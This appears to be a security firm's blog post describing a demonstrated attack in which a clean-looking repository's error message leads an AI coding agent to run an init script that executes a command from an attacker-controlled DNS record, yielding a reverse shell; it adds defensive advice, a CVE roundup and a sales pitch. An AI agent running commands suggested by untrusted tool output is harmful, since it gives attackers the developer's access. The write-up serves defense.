This month researchers at Mozilla's Zero Day Investigative Network demonstrated an attack that should change how every security team thinks about AI coding assistants. The attack has no exploit code. No malicious files in the repository. No suspicious command for anyone to approve. And it ends with a stranger holding an interactive shell on a developer's machine.
The trick is that the attacker never attacks the developer. The attacker attacks the agent.
How a clean repo becomes a reverse shell
The setup looks ordinary. A GitHub repository with a normal README, standard dependencies, and the kind of init instructions you have run a thousand times: pip3 install -r requirements.txt, then python3 -m axiom init.
The Python package is the bait, and it is built to misbehave on purpose. It refuses to run until it has been initialized, throwing an error that politely instructs the user to run python3 -m axiom init. A human might pause here. An AI coding agent does not. Claude Code reads the error, treats it as a routine setup hiccup, and runs the suggested command to recover - exactly what a helpful assistant should do.
That init command calls a shell script. The script pulls a configuration value out of a DNS TXT record the attacker controls, and the value is executed as a command. The agent never saw the DNS record. It never evaluated the payload. It fixed an error message it trusted, and three indirection steps later, the attacker has a shell running as the developer's own user.
As the 0DIN researchers put it: Claude Code never decided to open a shell. It decided to fix an error.
Why this is different from supply chain attacks you already know
We have spent years training teams to scan dependencies, pin versions, and review code before it runs. Those controls all assume the malicious thing is in the package. Here, it is not. Every individual component is clean. The repository passes a scanner. The init script, read in isolation, fetches a config value - something packages do constantly. The DNS record is just text.
The attack lives in the seams between the parts, and the agent is the connective tissue that assembles them into a working exploit. No single artifact is suspicious enough to trip a control, because the maliciousness is distributed across the whole chain and only assembles at runtime.
This is what makes it dangerous. Your SAST tool has nothing to flag. Your dependency scanner has nothing to flag. Your human reviewer skims a benign README. The only component capable of seeing the full chain - the agent - is also the component that has been convinced to run it.
The identity problem underneath it
There is a second story running alongside this one, and it is the real lesson. AI agents now act with real privileges. They read environment variables. They hold API keys. They touch local config, cloud credentials, and source control. When an agent runs a command, it runs as you, with everything you can reach.
That means an agent tricked into running a payload is not a sandboxed nuisance. It is a privileged identity doing the attacker's work with the developer's access. The shell that opens has the developer's environment variables, their keys, their session tokens, and a clear path to persistence.
Security teams have spent a decade locking down human identities with MFA, least privilege, and conditional access. Agent identities have quietly arrived with broad standing access and almost none of that governance. Attackers noticed before most defenders did.
What this means for how you test
A scanner cannot find this, because there is nothing static to find. The exploit only exists when an agent assembles it. That is precisely the gap our AI pen test agents are built to probe - we do not just check whether a package is malicious, we check what your tooling will actually do when handed an ordinary-looking project with a well-placed error message.
Three things worth doing now:
- Treat agent execution as privileged execution. If an AI assistant can run shell commands with a developer's access, that path deserves the same scrutiny as any other privileged automation - logging, scoping, and review.
- Demand full chain disclosure. 0DIN's own recommendation is that agents surface the complete execution chain of setup commands, including scripts and anything fetched dynamically at runtime. If your agent cannot show you what it is about to run end to end, you cannot review it.
- Constrain where agents reach. An agent that needs to clone and build a project does not need standing access to production secrets. Scope the credentials available during automated setup down to the minimum, so a hijacked agent finds an empty room.
The supporting cast this week
The agent attack did not arrive in a quiet week. SimpleHelp's remote monitoring tool is under active exploitation through an authentication bypass (CVE-2026-48558) that lets attackers mint their own Technician accounts and remote into managed endpoints - a clean route to deploying the new Djinn infostealer. Oracle E-Business Suite is being hit through a critical flaw (CVE-2026-46817), with exploitation confirmed in the wild. And CISA set an urgent deadline for the Cisco Unified Communications Manager bug we covered last week, which remains under active attack.
The pattern holds. The vulnerabilities that hurt are rarely the exotic ones. They are the trusted tools - the remote support agent, the finance suite, the coding assistant - turned against the people who rely on them.
Test the tools you trust most.
uMercs runs offensive engagements that probe the systems your team assumes are safe - including the AI agents now embedded in your development pipeline. If you want to know what your tooling does when no one is watching, that is the engagement we run. Reach us at umercs.com.
Sources
Mozilla 0DIN - AI coding agent reverse shell via clean repository (June 27, 2026)
BleepingComputer - Clean GitHub repo tricks AI coding agents into running malware
BleepingComputer - Critical SimpleHelp flaw exploited to deploy Djinn Stealer (CVE-2026-48558)
BleepingComputer - Hackers now exploit critical Oracle E-Business flaw (CVE-2026-46817)
BleepingComputer - CISA sets urgent deadline to fix Cisco flaw exploited in attacks
Token Security via BleepingComputer - Agentic AI Has an Identity Problem and Attackers Know It
